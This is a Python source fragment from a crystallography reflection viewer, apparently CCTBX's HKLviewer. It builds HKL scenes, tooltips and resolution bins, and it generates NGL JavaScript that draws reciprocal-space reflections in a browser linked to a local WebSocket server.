def set_miller_array(self, col=None, merge=None, details=""):
if col is not None:
self.iarray = col
if self.iarray >= 0:
self.miller_array = self.HKLscenes[self.iarray].miller_array
self.scene = self.HKLscenes[self.iarray]
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
self.sg = self.miller_array.space_group()
self.symops = self.sg.all_ops()
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc) )
def MakeToolTips(self, HKLscenes):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
allcolstraliases = "var hk = \'H,K,L: \';\n"
alltooltipstringsdict = {}
if self.script_has_tooltips:
# large data sets will make javascript file very large with risk of crashing browser
self.mprint( "making tooltips")
tooltipstringsdict = {}
for j,hklscene in enumerate(HKLscenes):
#tooltipstringsdict, colstraliases = MakeTtips(hklscene, j)
#"""
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
colstraliases = "\n var st%d = '\\n%s: ';" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
hkl = hklscene.indices[i]
if hkl not in tooltipstringsdict:
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
# st1, st2,... are javascript aliases for miller array labelstrings as declared in self.colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
#"""
alltooltipstringsdict.update( tooltipstringsdict )
allcolstraliases += colstraliases
allcolstraliases += "\n"
return alltooltipstringsdict, allcolstraliases
#def GetTooltipOnTheFly(self, hkl, rotmx=None, anomalous=False):
def GetTooltipOnTheFly(self, id, rotmx=None, anomalous=False):
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
Rhkl = hklvec[0]
if rotmx:
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if anomalous:
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
# resolution and angstrom character
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
for hklscene in self.HKLscenes:
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
#datval = hklscene.work_array.data_at_first_index(hkl)
if id >= hklscene.data.size():
continue
datval = hklscene.data[id]
if datval and (not (math.isnan( abs(datval) ) or datval == display.inanval)):
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
"\'+ String.fromCharCode(176) +\'" # degree character
elif hklscene.work_array.sigmas() is not None:
sigma = hklscene.work_array.sigma_at_first_index(hkl)
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.hkl_scenes_info) == 0:
return -1, -1
return self.hkl_scenes_info[idx][6], self.hkl_scenes_info[idx][7]
def ConstructReciprocalSpace(self, currentphil, merge=None):
self.mprint("Constructing HKL scenes")
#self.miller_array = self.match_valarrays[self.iarray]
#self.miller_array = self.proc_arrays[self.iarray]
self.HKLscenesKey = (currentphil.filename,
currentphil.spacegroup_choice,
currentphil.using_space_subgroup,
currentphil.merge_data,
#self.settings.expand_anomalous,
#self.settings.expand_to_p1,
self.settings.inbrowser,
self.settings.slice_axis,
self.settings.slice_mode,
self.settings.slice_index,
self.settings.show_missing,
self.settings.show_only_missing,
self.settings.show_systematic_absences,
self.settings.scale,
self.settings.nth_power_scale_radii
)
if self.HKLscenesKey in self.HKLscenesdict:
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
self.mprint("Scene key is already present", verbose=True)
#self.sceneisdirty = False
return True
HKLscenes = []
HKLscenesMaxdata = []
HKLscenesMindata = []
HKLscenesMaxsigmas = []
HKLscenesMinsigmas = []
hkl_scenes_info = []
tooltipstringsdict = {}
i = 0
# arguments tuple for multi_core_run
assert(self.proc_arrays)
argstuples = [ (e.deep_copy(), idx, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge, self.mprint) \
for (idx,e) in enumerate(self.proc_arrays)]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
for (i, (args, res, errstr)) in enumerate( easy_mp.multi_core_run( MakeHKLscene, argstuples, 8)):
if errstr:
self.mprint(errstr)
(hkl_scenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = res
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hkl_scenes)
for inf in scenearrayinfos:
self.mprint("%d, %s" %(i, inf) )
i += 1
"""
for j,proc_array in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(argstuples[j][0], argstuples[j][1], argstuples[j][2], argstuples[j][3], argstuples[j][4], argstuples[j][5] )
#) = MakeHKLscene(proc_array, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge)
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hklscenes)
#for inf in scenearrayinfos:
# self.mprint("%d, %s" %(i, inf) )
# i += 1
tooltipstringsdict, self.colstraliases = self.MakeToolTips(HKLscenes)
self.HKLscenesdict[self.HKLscenesKey] = (
HKLscenes,
tooltipstringsdict,
HKLscenesMaxdata,
HKLscenesMindata,
HKLscenesMaxsigmas,
HKLscenesMinsigmas,
hkl_scenes_info
)
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("\nReflection data scenes:", verbose=True)
for j,inf in enumerate(hkl_scenes_info):
self.mprint("%d, %s" %(j, inf[0]), verbose=True)
self.sceneisdirty = True
return True
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
for proc_array in self.proc_arrays:
fom_arrays_idx = []
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def UpdateBinValues(self, binvals = [] ):
if binvals:
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
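# For example, with d_max_min() == (50.0, 2.0) the padded interval above becomes roughly
# [1/50.05, 1/1.998] = [0.01998, 0.5005], so reflections exactly at the resolution limits
# still fall inside the default bins despite rounding.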
def DrawNGLJavaScript(self):
if not self.scene or not self.sceneisdirty:
return
if self.miller_array is None :
self.mprint( "A miller array must be selected for rendering the reflections" )
return
self.mprint("Composing NGL JavaScript...")
h_axis = self.scene.axes[0]
k_axis = self.scene.axes[1]
l_axis = self.scene.axes[2]
nrefls = self.scene.points.size()
l1 = 110
l2= 115
Hstararrowstart = roundoff( [-h_axis[0]*l1, -h_axis[1]*l1, -h_axis[2]*l1] )
Hstararrowend = roundoff( [h_axis[0]*l1, h_axis[1]*l1, h_axis[2]*l1] )
Hstararrowtxt = roundoff( [h_axis[0]*l2, h_axis[1]*l2, h_axis[2]*l2] )
Kstararrowstart = roundoff( [-k_axis[0]*l1, -k_axis[1]*l1, -k_axis[2]*l1] )
Kstararrowend = roundoff( [k_axis[0]*l1, k_axis[1]*l1, k_axis[2]*l1] )
Kstararrowtxt = roundoff( [k_axis[0]*l2, k_axis[1]*l2, k_axis[2]*l2] )
Lstararrowstart = roundoff( [-l_axis[0]*l1, -l_axis[1]*l1, -l_axis[2]*l1] )
Lstararrowend = roundoff( [l_axis[0]*l1, l_axis[1]*l1, l_axis[2]*l1] )
Lstararrowtxt = roundoff( [l_axis[0]*l2, l_axis[1]*l2, l_axis[2]*l2] )
# make arrow font size roughly proportional to radius of highest resolution shell
#fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0)))
axisfuncstr = """
var MakeHKL_Axis = function()
{
// xyz arrows
shape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origo');
//blue-x
shape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
shape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
shape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
shape.addText( %s, [ 0, 0, 1 ], %s, 'h');
shape.addText( %s, [ 0, 1, 0 ], %s, 'k');
shape.addText( %s, [ 1, 0, 0 ], %s, 'l');
};
""" %(str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt, fontsize,
Kstararrowtxt, fontsize, Lstararrowtxt, fontsize)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLscenesMindata[self.icolourcol]
maxcolourscalar = self.HKLscenesMaxdata[self.icolourcol]
if self.settings.sigma_color:
mincolourscalar = self.HKLscenesMinsigmas[self.icolourcol]
maxcolourscalar = self.HKLscenesMaxsigmas[self.icolourcol]
span = maxcolourscalar - mincolourscalar
ln = 60
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray =flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscenes[self.icolourcol].miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in range(ln):
val += incr
colourscalararray.append( val )
fomarrays = []
if self.HKLscenes[self.icolourcol].isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
# make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
else:
fomln =1
fomarrays = [1.0]
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
else:
fomln = 1
fomarrays = [1.0]
colourgradarrays.append(graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme) * 255.0)
colors = self.HKLscenes[self.icolourcol].colors
radii = self.HKLscenes[self.iradiicol].radii
points = self.scene.points
hkls = self.scene.indices
dres = self.scene.dres
colstr = self.scene.miller_array.info().label_string()
data = self.scene.data
colourlabel = self.HKLscenes[self.icolourcol].colourlabel
fomlabel = self.HKLscenes[self.icolourcol].fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.workingbinvals = []
if self.binarray != "Resolution":
ibinarray= int(self.binarray)
self.workingbinvals = [ self.HKLscenesMindata[ibinarray] - 0.1 , self.HKLscenesMaxdata[ibinarray] + 0.1 ]
self.workingbinvals.extend( self.binvals )
self.workingbinvals.sort()
if self.workingbinvals[0] < 0.0:
self.workingbinvals.append(0.0)
self.workingbinvals.sort()
bindata = self.HKLscenes[ibinarray].data
if self.HKLscenes[ibinarray].work_array.is_complex_array():
bindata = self.HKLscenes[ibinarray].ampl
else:
self.workingbinvals = self.binvals
colstr = "dres"
bindata = 1.0/dres
self.nbin = len(self.workingbinvals)
for ibin in range(self.nbin):
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.workingbinvals):
if (ibin+1) == self.nbin:
return ibin
if d > binval and d <= self.workingbinvals[ibin+1]:
return ibin
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
raise Sorry("Should never get here")
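# Example of the binning above: with workingbinvals == [0.1, 0.25, 0.5] a bindata value
# of 0.3 satisfies 0.25 < 0.3 <= 0.5 and is therefore placed in bin index 1, while any
# value above the last edge falls through to the final bin.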
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( bindata[i] )
positions[ibin].extend( roundoff(list(hklstars), 2) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
#spbufttips[ibin].append(self.tooltipstrings[i] )
spherebufferstr = ""
if self.script_has_tooltips:
spbufttips[ibin].append(self.tooltipstringsdict[hkls[i]])
else:
spbufttips[ibin].append( i )
spherebufferstr += self.colstraliases
negativeradiistr = ""
cntbin = 0
self.binstrs = []
for ibin in range(self.nbin):
mstr =""
nreflsinbin = len(radii2[ibin])
if (ibin+1) < self.nbin and nreflsinbin > 0:
bin1= self.workingbinvals[ibin]
bin2= self.workingbinvals[ibin+1]
if colstr=="dres":
bin1= 1.0/self.workingbinvals[ibin]
bin2= 1.0/self.workingbinvals[ibin+1]
mstr= "bin[%d] has %d reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
self.binstrs.append(mstr)
self.mprint(mstr, verbose=True)
spherebufferstr += "\n// %s\n" %mstr
if self.script_has_tooltips:
uncrustttips = str(spbufttips[ibin]).replace('\"', '\'')
uncrustttips = uncrustttips.replace("\'\'+", "")
spherebufferstr += " ttips.push( %s );" %uncrustttips
else:
#spherebufferstr += " ttips.push( [ ] );"
ttlst = [-1]
ttlst.extend(spbufttips[ibin])
spherebufferstr += " ttips.push( %s );" %str( ttlst )
spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
str(radii2[ibin]), self.primitivetype, cntbin, \
cntbin)
if self.primitivetype == "SphereBuffer":
spherebufferstr += "\n radius: radii[%d]," %cntbin
spherebufferstr += "\n picking: ttips[%d]," %cntbin
if self.primitivetype == "PointBuffer":
spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.settings.scale
else:
spherebufferstr += """\n })
//}, { disableImpostor: true // to enable changing sphereDetail
//, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
//}, { disableImpostor: true }) // if true allows wireframe spheres but does not allow resizing spheres
);
"""
spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n" %cntbin
if self.workingbinvals[ibin] < 0.0:
negativeradiistr += "shapebufs[%d].setParameters({metalness: 1});\n" %cntbin
cntbin += 1
spherebufferstr += """
// create tooltip element and add to the viewer canvas
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(
function (pickingProxy)
{
tooltip.style.display = "none";
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
var cp = pickingProxy.canvasPosition;
"""
if self.script_has_tooltips:
spherebufferstr += """
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var sym_id = -1;
var hkl_id = -1
if (pickingProxy.picker.length > 0)
{ // get stored id number of symmetry operator applied to this hkl
sym_id = pickingProxy.picker[0];
var ids = pickingProxy.picker.slice(1);
var is_friedel_mate = 0;
hkl_id = ids[ pickingProxy.pid % ids.length ];
if (pickingProxy.pid >= ids.length)
is_friedel_mate = 1;
}
// tell python the id of the hkl and id number of the symmetry operator
mysocket.send( 'tooltip_id: [' + String([sym_id, hkl_id, is_friedel_mate]) + ']' );
if (current_ttip !== "" )
{
tooltip.innerText = current_ttip;
"""
spherebufferstr += """ tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}
}
current_ttip = "";
}
);
"""
spherebufferstr += """
stage.signals.clicked.add(
function (pickingProxy)
{
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
"""
if self.script_has_tooltips:
spherebufferstr += """
var innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var innerText = pickingProxy.pid;
"""
spherebufferstr += """
mysocket.send( innerText);
}
}
);
"""
colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
rgb = roundoff(val[1], 1)
gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
vstr = str( roundoff(val[0], 2) )
colourgradstr.append([vstr , gradval])
colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
#negativeradiistr = ""
#for ibin in range(self.nbin):
# if self.workingbinvals[ibin] < 0.0:
# negativeradiistr += "shapebufs[%d].setParameters({metalness: 1})\n" %ibin
self.NGLscriptstr = """
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:7894/');
mysocket.onopen = function(e)
{
mysocket.send('%s now connected via websocket to ' + pagename + '\\n');
mysocket.send( 'Ready ' + pagename + '\\n');
};
mysocket.onclose = function(e)
{
mysocket.send('%s now disconnecting from websocket ' + pagename + '\\n');
mysocket.send( 'Ready ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function(error)
{
console.log('WebSocket Error ' + error);
};
window.addEventListener( 'resize',
function( event ){
stage.handleResize();
},
false
);
var stage;
var shape;
var shapeComp;
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
var ttips = [];
var current_ttip = "";
var positions = [];
var br_positions = [];
var br_colours = [];
var br_radii = [];
var br_ttips = [];
var colours = [];
var radii = [];
var shapebufs = [];
var br_shapebufs = [];
var nrots = 0;
function createElement(name, properties, style)
{
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name);
Object.assign(el, properties);
Object.assign(el.style, style);
Object.assign(el.style,
{
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
);
return el;
}
function addElement(el)
{
// utility function used in for loop over colourgradvalarray
Object.assign(el.style,
{
position: "absolute",
zIndex: 10
}
);
stage.viewer.container.appendChild(el);
}
function addDivBox(txt, t, l, w, h, bgcolour='rgba(255.0, 255.0, 255.0, 0.0)')
{
divbox = createElement("div",
{
innerText: txt
},
{
backgroundColor: bgcolour,
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: t.toString() + "px",
left: l.toString() + "px",
width: w.toString() + "px",
height: h.toString() + "px",
}
);
addElement(divbox);
}
// define tooltip element
var tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, 0.75)",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
%s
var hklscene = function()
{
shape = new NGL.Shape('shape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
MakeHKL_Axis();
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update();
// if some radii are negative draw them with wireframe
%s
//colourgradvalarrays
%s
var ih = 3,
topr = 35,
topr2 = 10,
lp = 10,
wp = 40,
lp2 = lp + wp,
gl = 3,
wp2 = gl,
fomlabelheight = 25;
if (colourgradvalarray.length === 1)
{
wp2 = 15;
fomlabelheight = 0;
}
var wp3 = wp + colourgradvalarray.length * wp2 + 2;
totalheight = ih*colourgradvalarray[0].length + 35 + fomlabelheight;
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals as well as label legend of
// the displayed miller array
addDivBox("", topr2, lp, wp3, totalheight, 'rgba(255.0, 255.0, 255.0, 1.0)');
// print label of the miller array used for colouring
addDivBox("%s", topr2, lp, wp, 20);
if (colourgradvalarray.length > 1)
{
// print FOM label, 1, 0.5 and 0.0 values below colour chart
fomtop = topr2 + totalheight - 18;
fomlp = lp + wp;
fomwp = wp3;
fomtop2 = fomtop - 13;
// print the 1 number
addDivBox("1", fomtop2, fomlp, fomwp, 20);
// print the 0.5 number
leftp = fomlp + 0.48 * gl * colourgradvalarray.length;
addDivBox("0.5", fomtop2, leftp, fomwp, 20);
// print the FOM label
addDivBox("%s", fomtop, fomlp, fomwp, 20);
// print the 0 number
leftp = fomlp + 0.96 * gl * colourgradvalarray.length;
addDivBox("0", fomtop2, leftp, fomwp, 20);
}
for (j = 0; j < colourgradvalarray[0].length; j++)
{
rgbcol = colourgradvalarray[0][j][1];
val = colourgradvalarray[0][j][0];
topv = j*ih + topr;
toptxt = topv - 5;
// print value of miller array if present in colourgradvalarray[0][j][0]
addDivBox(val, toptxt, lp, wp, ih);
}
// draw the colour gradient
for (g = 0; g < colourgradvalarray.length; g++)
{
leftp = g*gl + lp + wp;
// if FOM values are supplied draw colour gradients with decreasing
// saturation values as stored in the colourgradvalarray[g] arrays
for (j = 0; j < colourgradvalarray[g].length; j++)
{
rgbcol = colourgradvalarray[g][j][1];
val = colourgradvalarray[g][j][0];
topv = j*ih + topr;
addDivBox("", topv, leftp, wp2, ih, rgbcol);
}
}
}
document.addEventListener('DOMContentLoaded', function() { hklscene() }, false );
mysocket.onmessage = function (e)
{
//alert('received:\\n' + e.data);
var c,
alpha,
si;
mysocket.send('\\n Browser: Got ' + e.data ); // tell server what it sent us
try
{
var datval = e.data.split(":\\n");
//alert('received2:\\n' + datval);
var msgtype = datval[0];
//alert('received3:\\n' + msgtype);
var val = datval[1].split(",");
if (msgtype === "alpha")
{
ibin = parseInt(val[0]);
alpha = parseFloat(val[1]);
shapebufs[ibin].setParameters({opacity: alpha});
for (var g=0; g < nrots; g++ )
br_shapebufs[ibin][g].setParameters({opacity: alpha});
stage.viewer.requestRender();
}
if (msgtype === "colour")
{
ibin = parseInt(val[0]);
si = parseInt(val[1]);
colours[ibin][3*si] = parseFloat(val[2]);
colours[ibin][3*si+1] = parseFloat(val[3]);
colours[ibin][3*si+2] = parseFloat(val[4]);
shapebufs[ibin].setAttributes({ color: colours[ibin] });
for (var g=0; g < nrots; g++ )
{
br_colours[ibin][3*si] = parseFloat(val[2]);
br_colours[ibin][3*si+1] = parseFloat(val[3]);
br_colours[ibin][3*si+2] = parseFloat(val[4]);
br_shapebufs[ibin][g].setAttributes({ color: br_colours[ibin] });
}
stage.viewer.requestRender();
}
if (msgtype === "ShowTooltip")
{
current_ttip = eval( String(val));
}
if (msgtype === "Redraw")
{
stage.viewer.requestRender();
}
if (msgtype === "ReOrient")
{
mysocket.send( 'Reorienting ' + pagename );
sm = new Float32Array(16);
//alert('ReOrienting: ' + val)
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j]);
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.requestRender();
}
if (msgtype === "Reload")
{
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
mysocket.send('Current vieworientation:\\n' + msg );
mysocket.send( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (msgtype.includes("Expand") )
{
mysocket.send( 'Expanding data...' );
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
br_positions = [];
br_colours = [];
br_radii = [];
br_ttips = [];
br_shapebufs = [];
//alert('rotations:\\n' + val);
strs = datval[1].split("\\n");
nbins = %d;
var Rotmat = new NGL.Matrix3();
var sm = new Float32Array(9);
var r = new NGL.Vector3();
for (var bin=0; bin<nbins; bin++)
{
var nsize = positions[bin].length/3;
var csize = nsize*3;
var nsize3 = nsize*3;
var anoexp = false;
if (msgtype.includes("Friedel") )
{
anoexp = true;
csize = nsize*6;
}
br_positions.push( [] );
br_shapebufs.push( [] );
br_colours.push( [] );
br_radii.push( [] );
br_ttips.push( [] );
br_colours[bin] = colours[bin];
br_radii[bin] = radii[bin];
if (anoexp)
{
var colarr = [];
var cl = colours[bin].length;
for (var i=0; i<cl; i++)
{
colarr[i] = colours[bin][i];
colarr[i+cl] = colours[bin][i];
}
br_colours[bin] = new Float32Array(colarr);
var radiiarr = [];
var rl = radii[bin].length;
for (var i=0; i<rl; i++)
{
radiiarr[i] = radii[bin][i];
radiiarr[i+rl] = radii[bin][i];
}
br_radii[bin] = new Float32Array(radiiarr);
}
nrots = 0;
for (var g=0; g < strs.length; g++ )
{
if (strs[g] < 1 )
continue;
nrots++;
br_positions[bin].push( [] );
br_shapebufs[bin].push( [] );
br_ttips[bin].push( [] );
br_ttips[bin][g] = ttips[bin].slice(); // deep copy with slice()
br_ttips[bin][g][0] = g;
br_positions[bin][g] = new Float32Array( csize );
var elmstrs = strs[g].split(",");
//alert('rot' + g + ': ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
Rotmat.fromArray(sm);
for (var i=0; i<nsize; i++)
{
idx= i*3;
r.x = positions[bin][idx];
r.y = positions[bin][idx+1];
r.z = positions[bin][idx+2];
r.applyMatrix3(Rotmat)
br_positions[bin][g][idx] = r.x;
br_positions[bin][g][idx + 1] = r.y;
br_positions[bin][g][idx + 2] = r.z;
if (anoexp)
{
r.negate(); // inversion for anomalous pair
br_positions[bin][g][nsize3 + idx] = r.x;
br_positions[bin][g][nsize3 + idx + 1] = r.y;
br_positions[bin][g][nsize3 + idx + 2] = r.z;
}
}
br_shapebufs[bin][g] = new NGL.SphereBuffer({
position: br_positions[bin][g],
color: br_colours[bin],
radius: br_radii[bin],
// g works as the id number of the rotation of applied symmetry operator when creating tooltip for an hkl
picking: br_ttips[bin][g],
});
shape.addBuffer(br_shapebufs[bin][g]);
}
}
MakeHKL_Axis();
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
repr.update();
stage.viewer.requestRender();
mysocket.send( 'Expanded data' );
}
if (msgtype === "Testing")
{
// test something new
mysocket.send( 'Testing something new ' + pagename );
/*
var newradii = radii[0].map(function(element) {
return element*1.5;
});
shapebufs[0].setAttributes({
radius: newradii
})
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
*/
}
